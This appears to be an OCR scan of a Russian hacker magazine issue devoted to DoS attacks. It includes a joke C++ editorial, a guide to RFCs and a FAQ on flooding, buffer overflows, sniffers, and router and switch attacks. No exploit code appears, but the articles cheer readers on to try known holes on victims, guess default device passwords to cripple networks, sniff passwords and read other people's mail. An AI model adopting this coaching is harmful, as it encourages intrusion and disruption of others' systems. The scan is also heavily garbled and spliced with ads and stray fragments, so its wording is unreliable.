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обзор ночных клубов 


он остался один в целом мире... 
наверное. это очень страшно 


ПОЛЕЗНЫЙ 
ЖУРНАЛ О 
МОБИЛЬНЫХ 
УСТРОЙСТВАХ 
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дорого, № 


В КАЖДОМ НОМЕРЕ: 


Обзор пучших моделей ноутбуков 

Тесты карманных компьютеров 

Как организовать мобильный офис 

Беспроводной доступ в интернет 

Полезные советы по выбору цифровых фотокамер 
Смартфоны, коммуникаторы, СРАЗ-тепефоны 
Свежие новости и многое другое 


BURN Het RUM RRO Peele Cad косые 
ШЛИ ПОТРЕБИТЕЛЕМ УОСИГЬНОЙ TERK 


#include <iostream.h> 
#include <stdio.h> 
#Hinclude <stdlib.h> 


int Intro() 
{ 


cout << “Привет, приятель!” << endl; 
if (start->read.position==from_begin) 


cout << “Перевернув страничку, ты начнешь читать самый лучший номер Спеца!” << endl; 
else if (start->read.position==from_end) 


cout << “Ты только что закончил читать самый лучший номер Creua!” << endl; 


} 
else {exit(1);} 


cout << “Таких номеров у Hac еще He было. Мы выложились на все CTO, “ << 
“досконально разобрав и разложив для тебя по полочкам все, “ << 
“что касается DoS-atak. Cover story этого номера получилась “ << 
“очень подробной и экстремально замороченной. Так что если “ << 
“ты чего-то“ 


if (start->read.position==from_begin) 


cout << “He поймешь” << endl; 


} 


else if (start->read.position==from_end) 


{ 


cout << “He понял” << endl; 


} 
else {exit(1);} 
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cout << “, пиши нам на spec@real.xakep.ru - всегда поможем :).” << endl; 


return (nOah); 


} 


Самый типичный 
(и самый тупой) 
пример band- 
width consump- 
tion = se 
банальный ping. 
Почему тупой? 
(as wg Да потому что 
пакеты ping- 
запросов и ping- 
ответов незначительно отличаются по 
размеру, и канал у атакующего и 
атакуемого забивается в равной 
степени - 3.14ZD0S может произойти 
обоим :). 


wy 


Ну, если тебя 
проперло быть 
ди-джеем и ты 
сподобился 
воткнуть в кузов 
вторую звуковуху, 
смело качай себе 
рулезную прогу 
Virtual Turntables 
(http://www.carrot. 
prohosting.com/). 


Если поискать в сети материалы по 
оптимизации - можно очень долго 
разбирать горы хлама, 
противоречащих друг другу 
заявлений и сообщений о 
"волшебном" ключике в реестре, 


после которого у чела 486-й 
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Бывает, поговоришь с оче- 
редным сетевым гуру и про- 
сто диву даешься, откуда он 
столько знает. Спросишь его, 
он что-то про какое-то RFC 
бормочет! Да что же это за 
ВЕС такое и как оно делает из 
обычного юзверя бога? Да- 
вай попробуем в этом разо- 
браться. 


ПРОСЬБА КОММЕНТИРОВАТЬ! 
Request for Sent переводится 
как “просьба прокомментиро- 
вать”. Как сделать начинку Ин- 
тернета так, чтобы он стал на 
самом деле международным? 
Нужно придумать несколько 
простых технологий, законов и 
механизмов, по которым будут 
работать все. Получается, нуж- 
ны стандарты. Но не простые 
стандарты, ате, которые можно 
быстро менять, ведь Интернет 
развивается не по дням, а по 
часам. Технологии быстро ста- 
реют, и надо искать замену. 
Словом, стандарты такие надо 
писать всем миром. Любой ин- 
женер или даже целая органи- 
зация могут придумать новую 
технологию, грамотно ее офор- 
мить в виде электронного до- 
кумента и сказать: “Ну, теперь 
поругайте/похвалите наши 
идеи”. Начинаются обсужде- 
ния и драки по поводу новой 
технологии. Название RFC под- 
черкивает то, что ВЕС писали 
всем лесом, а истина рожда- 
лась в жестоких спорах между 
Интернет-спецами. Ну и в ре- 
зультате все работает велико- 
лепно (почти все). 


КТО ЭТИМ ЗАПРАВЛЯЕТ? 

Конечно же, есть главный! Ес- 
ли бы его не было, то наступил 
бы хаос, все бы спамили друг 
друга рфсишками, так бы и не 
договорились, никаких между- 
народных стандартов не полу- 
чилось бы. Internet Enginee- 
ring Task Force - Служба инже- 


нерных задач Интернет 
(http://www.ietf.org/) заправ- 
ляет делом с 1986 года. Про- 
водит совещания, регистриру- 
ет желающих принять участие 
в обсуждении, выдает рфсиш- 
кам уникальные номера и ре- 
шает, какие из них признать 
стандартом. 


НЕ ВСЯКИЙ ВЕС - СТАНДАРТ! 
В просьбах прокомментиро- 
вать публикуется очень много 
разной информации, связан- 
ной с технологией Интернет. В 
этих документах можно найти 
описание сетевых протоколов, 
отчет об очередном обсужде- 
нии или даже шутку, как в пер- 
воапрельском ВЕС 
149.htn |). 

Чтобы лучше понимать, каким 
рфсишкам можно доверять, а 
каким нет, нужно знать, как 
они создаются. Сначала пишут 
текст документа и оформляют 
его по всем правилам. Потом 
проверяют, чтобы он не был 
полной ахинеей, не относя- 
щейся к интернет-технологи- 
ям вообще. Вдруг он окажется 
рассказом о том, как админы 
тестили презервативы? После 
того как ТЕТЕ убедилась в ос- 
мысленности документа, ему 
дают номер RFC и публикуют в 
качестве интернет-черновика 
Internet-Draft, сокращенно ID. 
После этого специалисты co 
всего мира начинают обсуж- 
дать черновик, начинают его 
править. Если это серьезная 
технология, то созывают ко- 
миссию и делают документ ре- 
комендованным стандартом. 

Далеко не все RFC имеют статус 
стандарта, сокращенно STD. Ес- 
ли КЕС изменили, то ей дают 
новый номер, а старый стан- 
дарт считается устаревшим. 
Есть еще FYI документы (For 
You Information) чисто инфор- 
мационные. Еще имеются чер- 


новики ID, о которых мы уже 
говорили. 

Отличить стандарты от прочих 
рфсишек можно по специаль- 
ным спискам (http://www.rfc- 
editor.org/std-index.html) 
стандартов, с указателем номе- 
ров документов. Прелесть в 
том, что ты можешь не только 
почитать готовые стандарты, 
но и почитать логи, как они со- 
здавались. Причем это бес- 
платно. 


КАКИЕ RFC ЧИТАТЬ, ЧТОБЫ 
СТАТЬ КРУТЫМ? 

Понятно, что начинать с RFC но- 
мер 1 глупо. Тогда на чтение 
всей макулатуры уйдут лучшие 
годы твоей жизни, за которые 


напишут еще столько же новых 
рекомендаций. В КЕС нужно чи- 
тать то, что тебе интересно, что- 
бы найти ответы на свои вопро- 
сы. А чтобы такие вопросы у Te- 
бя возникли, вот тебе базовый 
набор самых культовых рфси- 
шек. Темы и номера стандартов: 


826 - Address Resolution 
Protocol (протокол разреше- 
ния адреса) 

АВР пригодится тебе, если ты 
решил мутить 0о5-атаки в ло- 
кальной сети. С помощью этого 
протокола компы определяют, 
какой физический адрес у ТР- 
адреса. Отличные знания АКР 
помогут прикинутся чужой тач- 
кой в локальной сети. 


791, 760 - Internet Protocol 
(Интернет протокол) 

Протокол ТР. Базовый прото- 
кол в Интернете. Без него про- 
сто не пошевелишь пальцем, 
нужно знать и понимать, как он 
работает. 


792, 777 - Internet Control 
Message Protocol (протокол 
контрольных сообщений Ин- 
тернет) 

Один из любимых хакерских 
протоколов. Сообщает об 
ошибках, происходящих в се- 
ти. Многие DoS-ataku строятся 
на нем. 


1131 - OSPF specification 
Протокол маршрутизации. Ec- 


ли ты хочешь разобраться в ра- 
боте современных маршрути- 
заторов - разбирайся. Только 
не сломай об него зубы. Это од- 
на из самых сложных и запу- 
танных тем. 


1058 - Routing Information 
Protocol (Протокол маршрут- 
ной информации) 

(Старый добрый протокол мар- 
шрутизации ВТР. Сильно проще 
OSPF. Сейчас работает в не- 
больших сетках. 


768 - User Datagram Protocol 
(протокол пользовательских 
датаграмм) 

UDP отвечает за посылку сооб- 
щения в один конец. Он очень 


простой и быстрый, не требует 
подтверждений. Некоторые 
DoS-ataku используют UDP. 


793, 761, 675 - Transmission 
Control Protocol (протокол 
контроля передачи) 

ТСР - еще один важнейший 
протокол в Интернете. Про не- 
го обязательно надо почитать, 
чтобы понять суть DoS-atak. 
Непременно разберись, что та- 
кое окно и что такое порт. Если 
ты не понимаешь, как работают 
эти две штуки, значит сушишь 
весла. 


854, 764 - Telnet Protocol 
Specification 

По этому протоколу можно уп- 
равлять сервером через Интер- 
нет. Если ты захватил права ад- 
министратора и этот протокол 
не выключен на сервере, то он 
ПОЗВОЛИТ тебе творить с серве- 
ром все, что угодно, с помощью 
нескольких стандартных ко- 
манд. Команды не зависят от 
телнета, а зависят от софта, 
стоящего на сервере. 


821, 788 - Simple Mail 
Transfer Protocol (простейший 
протокол передачи почты) 
SMTP - протокол, по которому 
ты отправляешь мыло. Один из 
старейших протоколов. Если 
решил переделать свою мыль- 
ницу - изучай. 


624 - Comments on the File 
Transfer Protocol (npotokon 
передачи файлов) 

FTP, как известно, используют 
для того, чтобы качать файлы с 
сервера и на сервер. Иногда 
открытый доступ к FTP - куль- 
ный инструмент для атаки DoS. 


1034 - Domain names - con- 
cepts and facilities (доменные 
имена) 

Еще одна фича, без которой не 
прожить. DNS позволяет запи- 
сать ПР-адрес хоста словами. 
Как это происходит, нужно 
представлять. Может, удастся 
захватит чужое имя. 


1081 - Post Office Protocol - 
version 3 (протокол почтовой 
службы) 

Ну и, конечно, POP3 - протокол, 
по которому ты получаешь поч- 
ту. Пригодится тем, кто хочет 
научиться выгребать чужую :). 


С ЧЕГО НАЧАТЬ? 

Не нужно сразу бросаться чи- 
тать стандарты. Сначала можно 
изучить упрощенные тексты по 


Интернет. Например, на 
www.citforum.ru. Обязательно 
нужно разобраться с ТР и TCP. 
Потом нужно прочесть про ос- 
тальные протоколы. И только 
когда ты решил углубиться, 
нужно браться за ВЕС. Начи- 
нать сразу со стандартов то же 
самое, что изучать китайский 
по трудам великого Мао. 


Многие молятся на КЕС. Но это 
всего лишь общие рекоменда- 
ции. Если ты решил копать еще 
глубже, то тебе понадобится 
документация производите- 
лей. Все стараются написать 
софт, соответствующий RFC. Ho 
большинство производителей 
так или иначе уходят от стан- 


дартов и клепают свое. Хорошо J 


разобраться с работой TCP/IP 
тебе поможет ковыряние в ис- 
ходниках какого-нибудь УМХ 
или книжка, в которой расска- 
зано, как устроен модуль 
TCP/IP в Юниксе. 

Не нужно забывать, что ВЕС 
рассказывает в основном о 
TCP/IP с примочками. Но обо- 
рудование Интернета может 
использовать другие протоко- 
лы, более низкого уровня, и 
железные интерфейсы. А там 
свои международные стандар- 
ты, разработанные другими ко- 
митетами. RFC - очень узкий 
набор стандартов. И если ты 
хочешь стать гуру в сетевых 
технологиях, то одними RFC ни- 
как не обойтись. 


Ссылки 


http://www.fags.org/ На этом | 


сервере валяются самые све- 
жие RFC. Есть удобная система 
поиска, можно найти нужный 


стандарт не только по номеру, : 


HO и по ключевым словам. 


Вере. / Ват. гово ries 
rfc_id.htm. А тут рассказывает- 
ся, как создают RFC, и еще они 
удобно разложены по катего- 
риям. 


Вер: //ммм. тагК-1ЕЕ.ги/ 
FWO/tcpip/ Мечта новичка. Пе- 
ревод основных моментов КЕС 
по TCP/IP на русский язык. Чи- 
тать можно с самого начала и 
до конца. 


http://lib.ru/TCPBOOK/tcp2. txt. 
Путеводитель по существую- 
щим стандартам. RFC разложе- 
ны по темам. Названия доку- 
ментов английские, заголовки 
тем русские. 


—. 
a ate ь. | 
Матушка Лень (MLen@mail.ru) 


м Е Что такое протокол? 


Это правила, по которым общаются 
компы между собой. Чтобы соединить 
два компа, оба должны знать прото- 
кол, по которому они будут между со- 
бой общаться. Проще объяснять на во- 
допроводе: две трубы, насосы, слив- 
ные баки - это сеть, а вода - данные, 
которые через эти трубы текут от од- 
ного насоса к баку (или то же самое, 
но с обратной стороны). Так вот, если 
одна труба не подходит к другой по 
диаметру или оба насоса качают воду 
одновременно, или ни один из насосов 
ничего не качает, а оба бака ждут, ког- 
да в них поступит вода, то ничего ра- 
ботать не будет. Воды либо вообще 
нет, либо она вытекает в щели - при- 
ходят соседи и сообщают, что теперь 
ты должен делать им ремонт на халя- 
ву. Так что водопроводное оборудова- 
ние должно знать протокол передачи 
воды: например, сначала один насос 
качает литров сто в бак второго, потом 
ждет, пока тот закачает ему литров 
двести и т.д. Чтобы инфа текла нор- 
мально, сетевые устройства должны 
придерживаться одинаковых протоко- 
лов передачи данных - каждый знает, 
что и когда ему в определенный мо- 
мент надо принять или отправить, что 
делать после этого. 
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Какие бывают протоколы? 


Какие придумаешь, такие и бывают - все 
зависит от потребностей. Допустим, ты не 
любишь, когда банкомат теряет половину 
денег с твоего счета. Такое может слу- 
читься, пока инфа дойдет от сервера в 
банке до банкомата. Тебе нужен надеж- 
ный протокол с подтверждением правиль- 
ности доставки инфы. А твой малолетний 
братишка, допустим, любит смотреть пор- 
нофильмы по сети. Ему не важно, если 
возникнут ошибки и пара кадров не дой- 
дет, главное, чтобы порно шло задорно и 
не тормозило. Брательнику нужен прото- 
кол без подтверждения и других лишних 
наворотов. Каждый наворот жрет драго- 
ценную скорость. Словом, протоколов на 
свете может быть сколько угодно, и они 
обычно заточены под определенные зада- 
чи, под определенные данные. На водо- 
проводе: чтобы полить огород, покатит 
обычный резиновый шланг, а с газовой 
трубой заколеблешься поливать огород 
(хотя некоторые пытаются). Зато по рези- 
новому шлангу газ пускать стремно, а по 
газовой трубе как-то спокойнее. 


Что 


кое сервер? 


Сервер - агрегат, который предоставля- 
ет услуги (сервисы). Чаще всего сервер 
хранит какую-нибудь ценную инфу. И 


a i 


выдает ее по запросам клиентов. Это и 
есть услуги. Еще сервер может эту инфу 
перерабатывать, проводить поиск, вести 
статистику и т.п. Это все тоже услуги. 
Словом, сервер - это такая большая и 
толстая цистерна, в которой накаплива- 
ется и булькает инфа, а предоставление 
по выбору горячей или холодной воды - 
это услуга. Вообще, предоставление во- 
ды - уже не хилый сервис. 


Что такое клиент? 


Ну а клиент - это компьютер или про- 
грамма, которая потребляет услуги. Что- 
бы услуги получить, сначала нужно со- 
единиться с сервером по протоколу, ко- 
торый тот поддерживает. Чтобы полу- 
чить услуги по получению воды (инфы), 
тебе нужно подрубиться к серверу (цис- 
терне) со своим рукомойником, душем, 
стиральной машиной или что у тебя там? 
Пофиг, какой у тебя мойдодыр, главное, 
чтобы труба (протокол) от него шла, 
совместимая с цистерной (сервером). 


Кто такой администратор? 


Ах да, мы забыли бородатого! Это ос- 
новное зло, которое мешает тебе полу- 
чать услуги. Есть такой злобный сан- 
техник (администратор), который сле- 
дит за цистерной (сервером). Допус- 
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Что такое DoS-ataka? 


полу ол 
атаки (только в особо гиморных случаях 

этапных хаках или при социальной инженер, 

нуть необходимость вывести какой-нибудь сервер из 


Как валят серваки? 


У любого сервера есть ресурсы, которые не беспредельны. 
Т.е. сервер может переработать без проблем определенное 
количество инфы, а если ее больше, то начинаются тормоза, 
а если еще больше, то часть пользователей получают отказ в 
обслуживании. Отсюда самый простой способ провести DoS- 
атаку - нафлудить. Т.е. перегрузить сервак мусорными запро- 
сами, и он не сможет отвечать на запросы нормальных поль- 
зователей. В результате сервер может отрубиться только на 
время атаки либо вообще зависнуть. Объясняю на водопро- 
воде: тебя так разозлил сантехник, отключивший горячую во- 
ду, что ты подключил к своему рукомойнику насос и стал под 
давлением качать туда дерьмище из канализации. Дерьмище 
забило трубы и просочилось сквозь заглушки и краны, после 
этого от горячей воды стало вонять, и никто ею больше поль- 
зоваться не смог. Но ты не остановился и стал качать даль- - 2 | . 
we, после этого админовскую цистерну разорвало, стало | Benin Dungeon Siege _ Те fica? Ill: Ng 
очень грязно, стало очень плохо пахнуть, все заклинило. Ура! | 

Теперь в доме вообще нет воды, а также отопления, т.е. все 

сервисы в дауне, и поднимут их не скоро. 


Что такое оаспоелеленная 
DoS-atTaka? 


$24.99 


$72.95 


Проблема в том, что у хацкера канал узенький, а Ha сервер 
идет канал потолще. Т.е. у хацкерского канала очень низкая 
пропускная способность и мусорных сообщений пролезает не- Diablo Il 
достаточно, чтобы опрокинуть сервер или забить его канал. 
Поэтому он договаривается со своими друзьями, и они начина- 
ют флудить вместе, каждый со своего компьютера. Понятно, 
что если один человек начнет вместо горячей воды качать a 
дерьмище в водопроводную трубу, особо страшного ничего не ol 
случится, но если они соберутся всем районом, TO сантехникам A 
придется не сладко. Кстати, распределенную атаку намного 
сложнее засечь и сложнее с нею бороться. 


Что такое 
вирусная DoS-ataka? 


Понятно, что не у всех в запасе целый район сумасшедших 
друзей. Допустим, от взломщика так воняет, что никто не хо- 
чет с ним водиться. На этот случай тоже есть способ. Люди 
на самом деле дружат с хацкером, только сами об этом не 
знают. Ведь все, у кого на компьютере живет его новый ви- 
рус, теперь его друзья. Очень удобный способ дружить, пара- 
зитирование называется. Теперь пользователь узнает о том 
что с его компьютера проводиться атака только после т ПОДАРОК ОТКОМПАНИИ “БУКА” 
как к нему ворвется ОМОН. А для тех, кто уже привык к 
мерам на водопроводе, объясняю: вешаешь объяву в по 
де о бесплатной установке нагревателей воды, для те 
любит мыться холодной. А вместо нагревател 

елям говнонасосы. Вот он, сладкий запах 
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Но это ред случай - такому 
ой ие подвержены @®сяЙЙе серваки, а 
Whe юзверьские маны. 


Что такое атака 


с захваченного сервера? 


Допустим, у тебя есть пара знакомых сан- 
техник @ которые разводной ключ в ру- 
ках не держали и больше годятся для вы- 
шивания, чем для настоящей мужской ра- 
боты. А вентили крутишь ты. Теперь есть 
отличная возможность устроить засор 
уже городского масштаба с тяжелыми 
последствиями на экологию. Для тех, кто 
все еще хочет услышать про компьютеры, 
повествую: если хаксор уже ломанул ка- 
кой-то сервак и получил там права глав- 
ного сантехника... эээ, ну то есть админи- 
стратора, он сможет флудить другие сер- 
ваки с хорошей производительностью по 
хорошим каналам. Просто нужно попро- 
сить захваченный сервер отсылать мусор 
по определенному адресу. Если канал у 
врага тоньше, чем тот, на котором висит 
захваченный сервак, то можно забить 
ему канал. Некоторые энтузиасты выво- 
дят вирусы, которые заражают сервера и 
заставляют их атаковать. 


Что дает DoS ка? 


Вот тут наступают вещи, далекие от 
сантехники, хотя на водопроводе мож- 
но объяснить все :). ПоЗ-атака может 
сделать вражеский сервак недоступ- 
ным на несколько часов или на не- 
сколько дней. Это произойдет, если 
сервак зависнет или канал будет пере- 
гружен мусором. Ошибка, вызванная 
атакой, может помочь хаксору взло- 
мать систему и получить права админи- 
стратора на вражеской машине или 
просто использовать те услуги, кото- 
рые ему были недоступны. 
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Что такое атака 


"переполнение буфера"? 


Хоть дерись но Все Операционные Сис- 
темы (ОС) откомпилированы в машин- 
ный код, который исполняется на кон- 
кретном железе. Т.е. все откомпилиро- 
ванные программы хранятся в памяти в 
виде простейших машинных команд. Ес- 
ли устроить в нужном месте переполне- 
ние буфера на определенное число бит, 
то можно чуть-чуть поменять код уже от- 
компилированной программы. Идея про- 
ста: допустим, у тебя есть доступ только 
к верхнему ящику тумбочки. А тебе хо- 
чется во все оставшиеся ящики. В твой 
ящик можно складывать только 30 кило- 
граммов дерьма, это и есть буфер ящи- 
ка. А ты взял и навалил 36 кило 210 
граммов с тем расчетом, что дно ящика 
не выдержит, провалится и отопрет зам- 
ки на всех остальных ящиках. Поздрав- 
ляю, теперь ты администратор тумбочки. 


Как зашититься от атаки 


"переполнение буфера"? 


Нужно научить программу читать толь- 
ко те данные, которые должны быть 
помещены в буфер, а не просто любые 
данные, которые туда можно поместить 
в принципе. Т.е. у тумбочки нужно по- 
ставить маму с ремнем, которая просто 
не даст навалить в ящик больше 30 ки- 
лограммов дерьмища. Такие методы 
работают обычно на дешевых компью- 
терах. На специальных серверных ком- 
пах обычно есть аппаратная защита 
прав доступа. Т.е. дно у ящика в тум- 
бочке бронированное. 


Как научиться пользоваться 


переполнением буфера? 


Нужно научиться определять, какая 
именно система стоит на сервере, из 
чего сделан сервер. После этого нужно 


найти в Интернете список’ стандартных 
уязвимостей этойнсистемы и попробо- 
вать некоторые из них. Чтобы сработа- 
ла атака переполнением, необходимо 
иметь доступ к уязвимой программе. 
Т.е. нужно найти такую тумбочку, ря- 
дом с которой нет мамы с ремнем. Для 
того чтобы самостоятельно найти уяз- 
вимость системы и придумать к ней пе- 
реполнение, придется поставить эту си- 
стему на свой комп и поэксперименти- 
ровать с ней. 


Что такое дыры? 


Это недоделки, недочеты и ‘прочие 
слабые места в безопасности. Малове- 
роятно, чтоб среднестатистический 
хаксор нашел где-то дырищу. Намного 
проще найти список стандартных ды- 
рок и пробовать их на своей жертве - 
какая-то обязательно сработает. Не- 
плохо бы заодно попробовать эти 
дырки на своей машине - 


хороший способ защитить себя. Чтобы дырки прикрыть, на 
них ставят заплатки (патчи). Обычно на крутых ресурсах в 
сети админы все патчат очень быстро, а ламеры не патчатся 
вовсе. Поэтому на некоторых компах работают даже самые 
старые реликтовые дыры. И пусть не орут всякие злодеи, что 
дырки, описанные в Х, давно прикрыли. А вот и нет! Не все 
же админы на свете читают Х. 


Что такое сканер и сниффер? 


Это такие проги, которые нужны для того, чтобы узнать: 
как устроена вражеская сеть и какой там стоит софт. Эта 
инфа поможет подобрать нужный тип ПоЗ-атаки. Сканер 
перебирает Интернетовские адреса и порты и посылает на 
них пробные запросы на предмет стандартных дырищ. 
Правда, админ может легко обнаружить сканер и принять 
меры, т.к. все запросы пишутся в логи. Так что если хак- 
сор не хочет засветиться, не стоит пользоваться отлавли- 
ваемыми сканерами. Сниффер просто ловит данные из се- 
ти, в которой сидит. Сниффить с диалапного коннекта без 
мазы - кроме своих данных, ничего не поймаешь. А вот 
если комп в локальной сети, то вся инфа, которая течет 
по проводу мимо сниффающей тачки, будет отлавливать- 
ся сниффаком. Хакеры могут внедрить сниффер на чужой 
машине или чужом сервере, чтобы лучше изучить вражес- 
кую сетку, украсть пароль или подсмотреть пересылаемую 
информацию. 


Что делает маршрутизатор? 


Маршрутизатор нужен для того, чтобы проложить путь че- 
рез многочисленные сети от одной тачки к другой. Данные 
резво бегают через Интернет от твоего компа до любой 
другой тачки на планете, подключенной к всемирной пау- 
тине. Так вот, чтобы инфа не заблудилась по дороге, не 
застряла в пробке или на оборванном кабеле, нужен стре- 
лочник - маршрутизатор. Маршрутизаторы, как почтальо- 
ны, находят по глобальному интернетовскому адресу сеть, 
в которой живет сервак или другой комп, к которому тебе 
надо обратиться. 


Что такое Оо$-атака 
маршрутизатора? 


А теперь представь, что у тебя несколько серваков подключе- 
ны к сети через один маршрутизатор. Если он откажет, то ста- 
нет недоступна целая сеть, если, конечно, нет резервного мар- 
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шрутизатора.. Получае ГС 

весить маршрутизатор, Me ВУбить 
целую корпорацию от’сети или цент- 
ральный‘офис крупного банка, или да- 
же ‘целый город!"Маршрутизатор - про- 
сто специализированный компьютер, и 
его тоже можно перегрузить мусором 
до глюков, как и обычный сервер. 


Что такое Оо$-атака 


через маршрутизатор? 


Как ты понял, девайс важный, даже 
ключевой. На нем стоит своя специали- 
зированная операционка, у которой 
есть команды настройки. Естественно, 
маршрутизатор можно настраивать че- 
рез сеть, для этого нужно знать, что 
это за модель, иметь специальную соф- 
тину и пароль доступа. На многих де- 
вайсах пароли очень простые или за- 
водские, т.е. подобрать пароль не про- 
блема. Вместе с паролем хаксор полу- 
чит возможность перенастроить марш- 
рутизатор. Он сможет отключить или, 
еще лучше, заглючить целую сеть, при- 
чем не на час и не на день, а даже на 
целую неделю. Маршрутизатор настра- 
ивается обычно специалистами, потому 
что админы в них плохо понимают. Сна- 
чала будет париться админ неделю, а 
потом еще неделю будут ждать специа- 
листа, а потом еще неделю спец будет 
разбираться, как же так вышло. Вос- 
торг! Ну а если хаксор просто крут и 
разбирается в настройках данного аг- 
регата, то можно использовать его для 
других DoS-atak, например, можно пе- 
ренаправлять любые данные на адрес 
жертвы и обвалить чужой сервак. Глав- 
ная сложность в том, чтобы найти клю- 
чевой маршрутизатор и определить его 
модель. Благо, есть фирмы, которые 
открыто хвастаются преимуществами 
своего главного роутера, такое поведе- 
ние сильно облегчает взлом. 


Что такое коммутатор? 


У каждого компа есть физический ад- 
рес. Такой адрес живет обычно в се- 
тевом адаптере и прошит в его память. 
Сетевой адрес компьютеру назначает- 
ся отдельно. Если много компьютеров 
висят на одном проводе, то данные с 
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разными физическими адресами начи- 
нают мешать друг другу и потом мож- 
но подслушать (подсниффовать) ин- 
фу. Коммутатор разделяет такой ка- 
бель на несколько сегментов. За пре- 
делы сегмента выходят только данные 
с адресами, которых в сегменте нет. 
По-простому можно объяснить на при- 
мере фейс-контроля в клубах. Было 
четыре клуба: один для металлистов, 
другой для кислотников, третий для 
любителей бардов, а четвертый - для 
фэнов Бори Моисеева. Все четыре бы- 
ли в одном доме, четыре входа торча- 
ли рядом впритык. Поэтому все друж- 
но ходили друг к другу в гости, заха- 
ванные рейверы и пьяные металлюги 
все время попадали не в ту дверь, лю- 
бители бардовской песни ходили жа- 
ловаться на шум, а фэны Бори Моисе- 
ева просто хотели познакомиться с 
соседями. Словом, были зверские 
драки, и клубы работали плохо. По- 
этому хозяин решил поставить на вхо- 
де коммутатор - по вышибале на каж- 
дой двери. Один дядька пускал толь- 
ко кислоту, другой только металл, 
третий только бардов, а четвертый от- 
бивался от желающих познакомиться. 
После этого траффик оптимизировал- 
ся, т.е. разные субкультуры перестали 
друг другу мешать. 


Как оаботает DoS-ataka 


через коммутатор? 


Современные коммутаторы можно на- 
страивать по сети, и у них тоже обыч- 
но простые пароли. Значит, подобрав 
пароль, хацкер сможет заклинить 
чью-нибудь локальную сетку в офисе 
или компьютерном клубе. В некото- 
рых офисах стоят коммутаторы с до- 
бавленными функциями цифровой 
АТС. Можно не только повесить вра- 
гу сеть, но и телефон отключить. 


Что такое атака 


коммутаторов? 


Если локальная сетка большая и ком- 
мутаторов несколько, то они обмени- 
ваются между собой инфой о состоя- 
нии сети. Это нужно для того, чтобы 
исключить петли и активизировать 
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резервные маршруты. Ha примере че- 
тырех клубов можно объяснить это 
так: нужно следить, чтобы случайно 
не открылась дверь между комнатой 
с металлистами и комнатой с поклон- 
никами Бори Моисеева. А на тот слу- 
чай, если вход рейверского клуба за- 
вален укуренными телами кислотни- 
ков, нужно открыть резервный про- 
ход между рейверами и бардами, 
чтобы обеспечить хоть какой-то про- 
ход. Так BOT, можно притвориться 
коммутатором на своем компьютере 
и пытаться договориться с другими 
коммутаторами, таким образом посе- 
ять хаос. Например, можно побрить- 
ся наголо, чуть подкачаться и прики- 
нуться, подойти к вышибале, который 
держит дверь между металлистами и 
обожателями Бори Моисеева, и ска- 
зать, что, типа, надо открывать эту 
дверь, т.к. в другой намертво застрял 
металлюга, приехавший из Тулы. 


Чем отличается пакет 


от кадра? 


Пакет - электронное послание по гло- 
бальной сети. Это данные, к которым 
прилепили сетевой адрес. По этому 
адресу пакет дойдет до любой точки 
глобальной сети, если не потеряется. 
Кадр - это данные, к которым приле- 
пили физический адрес. Он должен 
дойти по кабелю до сетевого адапте- 
ра по этому адресу. Обычно бывает 
так: у нас есть медленная сетка, и мы 
упаковываем пакет в ее кадр, кадр 
доходит до сетевого адаптера шлюза, 
шлюз достает оттуда пакет и упако- 
вывает в кадр более быстрой сетки и 
т.д. Хотя девайс может этот медлен- 
ный кадр упаковать в быстрый. По- 
том все это распаковывается. Шлюз - 
агрегат, который передает данные из 
одной сетки в другую. Пакеты и кад- 
ры могут содержать не только рядо- 
вую инфу, но и управляющие коман- 
ды. Пакеты и кадры можно перехва- 
тывать, подделывать. DoS-ataka ино- 
гда проводится модифицированными 
пакетами, которые вызывают ошибку. 
Пару тысяч таких рвотных пакетиков 
- и сервер в дауне. ax 
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КЛАССИФИКАЦИЯ DoS-ATAK 


Невозможно охватить какую-либо область знаний целиком. 
Серая жижа в нашей голове работает таким образом, что 
намного легче охватить большой объем информации, поделив 
его на меньшие части, сгруппировав какие-то куски вместе, 
расклассифицировав. Раз уж мы с тобой взялись изучить 
досконально DoS-ataku, давай начнем с самого верха: 
разобьем все Во$-атаки на несколько типов, рассмотрим, какие 
типы существуют, посмотрим, чего в них общего. 


ЧЕТЫРЕ ОСНОВНЫХ ТИПА АТАК 00$ 

Насыщение полосы пропускания (bandwidth consumption) 
Эти атаки основаны на том, что хацкер под завязку запол- 
няет всяческим мусором атакуемую им сеть. Необходимым 
условием для этого является наличие у взломщика толстен- 
ного канала (во всяком случае, толще, чем у атакуемого хо- 
ста). Он отсылает на вражеский сервак тучи различных за- 
просов и прочей информационной пурги, насколько позво- 
ляет толщина его канала, забивая линию атакуемой маши- 
ны. Соответственно, забитая линия не может пропустить к 
серваку еще какие-либо другие запросы. Вот тебе и DoS :). 
Пользователи не могут получить доступ к серверу, а у само- 
го сервера начинает отъезжать крыша, и он даже может 
упасть в даун. Инфа с сервера становится временно недо- 
ступной для юзеров (пока админ не спохватится и не при- 
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мет меры). Bandwidth consumption - отличный выбор, если 
нужно временно вывести из строя какой-нибудь web-cep- 
вачек или базу данных. А также отлично подходит для вы- 
кидывания из сети всякого ламья, хамящего на ирце, - ведь 
у всякого диалапного ламья коннект часто очень хиленький 
:). И совсем не обязательно самому висеть на толстенном 
канале - достаточно иметь удаленный доступ к машине, ви- 
сящей на таком мощном конце. 

Самый типичный (и самый тупой) пример bandwidth con- 
sumption - это банальный ping. Почему тупой? Да потому 
что пакеты ping-3anpocoB и р1пд-ответов незначительно 
отличаются по размеру, и канал у атакующего и атакуемого 
забивается в равной степени - 3.147005 может произойти 
обоим :). Фишка катит, если 
у атакующего канал шире, 
чем у атакуемого, но это 
туфта, так как атакуемыми 
чаще всего оказываются 
сервера (с широченными 
каналами), а не левые диа- 
лапные юзеры. Поэтому “не 
тупыми” bandwidth соп- 
зитрЯоп-атаками считают- 
ся такие, при которых ата- 
куемый комп вынужден от- 
сылать значительно больше информации, чем атакующий. 
Простой пример - самый обычный НТТР-запрос на странич- 
ку. Клиент (хацкер) шлет серваку малюсенький запрос, ти- 
па “GET /index.html”, а сервер ему шлет эту самую 
index.html, размер которой может оказаться в сотни раз 
больше, чем размер запроса. Дальше вступает в силу эле- 
ментарная математика: хацкер висит, допустим, на мега- 


Resource starvation актуален, если у накерюги 
уже есть какой-то [ограниченный] доступ 
к ресурсам машины (например, у него есть 
непривилегированный аккацнт) - тут поле для 
действий значительно шире в том смысле, 
что взломщик не ограничен одними только пакетами, 
которые он может отсылать на удаленный сервер. 


байтном канале, а сервак - на десятимегабайтном; разница 
- пропускная способность канала сервера больше в десять 
раз; следовательно, если ответ будет по размеру превосхо- 
дить запрос, скажем, в пятнадцать раз, у хакера будет хоро- 
